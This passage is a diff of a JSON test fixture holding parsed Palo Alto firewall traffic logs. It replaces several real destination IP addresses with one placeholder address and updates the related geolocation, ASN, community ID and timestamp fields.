@@ -3718,7 +3755,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:k69UBIONLgCiGo9UhMOEY0pQnZ4=" + "community_id": "1:nXJPMgyoZKPj/sFnRLx/46siasg=" } }, "sequence_number": 32091134, @@ -3738,8 +3775,8 @@ ], "network": { "community_id": [ - "1:OnS/uikvrbdse63UYQtmHKrEk7k=", - "1:k69UBIONLgCiGo9UhMOEY0pQnZ4=" + "1:rEtmJzEn+xPva9gOVVLylYzxPWc=", + "1:nXJPMgyoZKPj/sFnRLx/46siasg=" ], "transport": "tcp", "application": "traps-management-service", @@ -3779,14 +3816,14 @@ ], "ip": [ "192.168.15.224", - "54.84.80.198", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941866628Z", - "original": "Nov 30 16:09:31 PA-220 1,2018/11/30 16:09:30,012801096514,TRAFFIC,start,2049,2018/11/30 16:09:30,192.168.15.224,54.84.80.198,192.168.1.63,54.84.80.198,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031560800Z", + "original": "Nov 30 16:09:31 PA-220 1,2018/11/30 16:09:30,012801096514,TRAFFIC,start,2049,2018/11/30 16:09:30,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:30.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -3809,25 +3846,30 @@ "destination": { "nat": { "port": 4282, - "ip": "199.167.55.52" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Sunnyvale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -122.0144, - "lat": 37.386 + "lon": 125.3228, + "lat": 43.88 + } + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" } }, "port": 4282, "bytes": 0, - "packets": 0, - "ip": "199.167.55.52" + "ip": "175.16.199.1", + "packets": 0 }, "rule": { "name": "new_outbound_from_trust" @@ -3845,7 +3887,7 @@ "packets": 8, "ip": "192.168.15.224" }, - "message": "192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -3860,7 +3902,7 @@ "destination": { "nat": { "port": 4282, - "ip": "199.167.55.52" + "ip": "175.16.199.1" } }, "endreason": "aged-out", 
@@ -3882,7 +3924,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:07q7McJtir76GhJwAJffz+C0sNo=" + "community_id": "1:8Hhd+w2Y0MvaNiYYEmdNER3RtJI=" } }, "sequence_number": 32091135, @@ -3902,8 +3944,8 @@ ], "network": { "community_id": [ - "1:wFD93203ukPDpbZjVJE5SAMYrw4=", - "1:07q7McJtir76GhJwAJffz+C0sNo=" + "1:22CvovQQDhMcaR2aY+8zyK8hACA=", + "1:8Hhd+w2Y0MvaNiYYEmdNER3RtJI=" ], "transport": "tcp", "application": "incomplete", @@ -3943,14 +3985,14 @@ ], "ip": [ "192.168.15.224", - "199.167.55.52", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 13000000000, - "ingested": "2021-09-08T12:40:05.941870221Z", - "original": "Nov 30 16:09:33 PA-220 1,2018/11/30 16:09:32,012801096514,TRAFFIC,drop,2049,2018/11/30 16:09:32,192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031566600Z", + "original": "Nov 30 16:09:33 PA-220 1,2018/11/30 16:09:32,012801096514,TRAFFIC,drop,2049,2018/11/30 16:09:32,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:32.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -3973,27 +4015,29 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 588, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 6 }, "rule": { @@ -4012,7 +4056,7 @@ "packets": 6, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -4027,7 +4071,7 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", 
@@ -4101,14 +4145,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941873698Z", - "original": "Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031570500Z", + "original": "Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:33.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -4131,27 +4175,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 130, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -4170,7 +4216,7 @@ "packets": 1, "ip": "192.168.15.210" }, - "message": "192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -4185,7 +4231,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -4207,7 +4253,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:JM1EdN05nKTy8Sq9WGpY15fCNJk=" + "community_id": "1:oGfTGYDsAux8eMBCoBff8uxez9M=" } }, "sequence_number": 32091137, @@ -4227,8 +4273,8 @@ ], "network": { "community_id": [ - "1:XjmNQR0k4Z9rGS6dXH+3mvmrqzA=", - "1:JM1EdN05nKTy8Sq9WGpY15fCNJk=" + "1:vRrHCKzYF5Vw0mmasFYnIzPK2V4=", + "1:oGfTGYDsAux8eMBCoBff8uxez9M=" ], "transport": "udp", "application": "dns", 
@@ -4268,14 +4314,14 @@ ], "ip": [ "192.168.15.210", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941877136Z", - "original": "Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031575Z", + "original": "Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:34.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -4295,27 +4341,29 @@ "destination": { "nat": { "port": 443, - "ip": "172.217.9.142" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 1991, - "ip": "172.217.9.142", + "ip": "175.16.199.1", "packets": 6 }, "rule": { 
@@ -4334,7 +4382,7 @@ "packets": 6, "ip": "192.168.15.224" }, - "message": "192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -4349,7 +4397,7 @@ "destination": { "nat": { "port": 443, - "ip": "172.217.9.142" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -4371,7 +4419,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:3vS12CJ5QBY6RbGXOUPYKL9E0+U=" + "community_id": "1:20YsvyETmfH7QkVygqjJx30vL9c=" } }, "sequence_number": 32091138, @@ -4391,8 +4439,8 @@ ], "network": { "community_id": [ - "1:lVJii2BraOSOIissazAe7/enqkQ=", - "1:3vS12CJ5QBY6RbGXOUPYKL9E0+U=" + "1:YZVhkrMgzSXG8zwnpm9Td0Ird5o=", + "1:20YsvyETmfH7QkVygqjJx30vL9c=" ], "transport": "udp", "application": "quic", 
@@ -4432,14 +4480,14 @@ ], "ip": [ "192.168.15.224", - "172.217.9.142", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 15000000000, - "ingested": "2021-09-08T12:40:05.941880602Z", - "original": "Nov 30 16:09:38 PA-220 1,2018/11/30 16:09:37,012801096514,TRAFFIC,test,2049,2018/11/30 16:09:37,192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031580400Z", + "original": "Nov 30 16:09:38 PA-220 1,2018/11/30 16:09:37,012801096514,TRAFFIC,test,2049,2018/11/30 16:09:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:37.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -4459,27 +4507,29 @@ "destination": { "nat": { "port": 443, - "ip": "151.101.2.2" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 54113, + "number": 4837, "organization": { - "name": "Fastly" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 523, - "ip": "151.101.2.2", + "ip": "175.16.199.1", "packets": 5 }, "rule": { @@ -4498,7 +4548,7 @@ "packets": 8, "ip": "192.168.15.224" }, - "message": "192.168.15.224,151.101.2.2,192.168.1.63,151.101.2.2,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -4513,7 +4563,7 @@ "destination": { "nat": { "port": 443, - "ip": "151.101.2.2" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", 
@@ -4535,7 +4585,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:l6nFWeOSs/2aQaVCfYhfQ09l0ko=" + "community_id": "1:Zojhh1pim37Z47JWoH9fh2sdpFg=" } }, "sequence_number": 32091139, @@ -4555,8 +4605,8 @@ ], "network": { "community_id": [ - "1:Te0H9rrEbN0bNEjgdC1n6hD8kQU=", - "1:l6nFWeOSs/2aQaVCfYhfQ09l0ko=" + "1:6c2ueHhY0M4XLGN5Qb1eQwjXp5A=", + "1:Zojhh1pim37Z47JWoH9fh2sdpFg=" ], "transport": "tcp", "application": "ssl", @@ -4596,14 +4646,14 @@ ], "ip": [ "192.168.15.224", - "151.101.2.2", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941884096Z", - "original": "Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,151.101.2.2,192.168.1.63,151.101.2.2,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031584700Z", + "original": "Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:38.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -4626,30 +4676,29 @@ "destination": { "nat": { "port": 443, - "ip": "216.58.194.66" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -122.0839, - "lat": 37.3861 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 2428, - "ip": "216.58.194.66", + "ip": "175.16.199.1", "packets": 4 }, "rule": { @@ -4668,7 +4717,7 @@ "packets": 5, "ip": "192.168.15.224" }, - "message": "192.168.15.224,216.58.194.66,192.168.1.63,216.58.194.66,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -4683,7 +4732,7 @@ "destination": { "nat": { "port": 443, - "ip": "216.58.194.66" + "ip": "175.16.199.1" } }, "endreason": "aged-out", 
@@ -4705,7 +4754,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:hVpNmZPedeB/gYRm9U4/gS+LNkQ=" + "community_id": "1:WQEhqz707biMNYr4xqpmYHCLRtE=" } }, "sequence_number": 32091140, @@ -4725,8 +4774,8 @@ ], "network": { "community_id": [ - "1:5umxbSgQhlPOZM9gbu1iBMqzRr8=", - "1:hVpNmZPedeB/gYRm9U4/gS+LNkQ=" + "1:SQhG1l5yDIlCMOEIVjUxYNpOE10=", + "1:WQEhqz707biMNYr4xqpmYHCLRtE=" ], "transport": "udp", "application": "quic", @@ -4766,14 +4815,14 @@ ], "ip": [ "192.168.15.224", - "216.58.194.66", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941887568Z", - "original": "Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,216.58.194.66,192.168.1.63,216.58.194.66,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031589100Z", + "original": "Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:38.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -4796,27 +4845,29 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 588, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 6 }, "rule": { @@ -4835,7 +4886,7 @@ "packets": 6, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -4850,7 +4901,7 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", 
@@ -4924,14 +4975,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941891046Z", - "original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031592700Z", + "original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:39.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -4954,27 +5005,29 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + 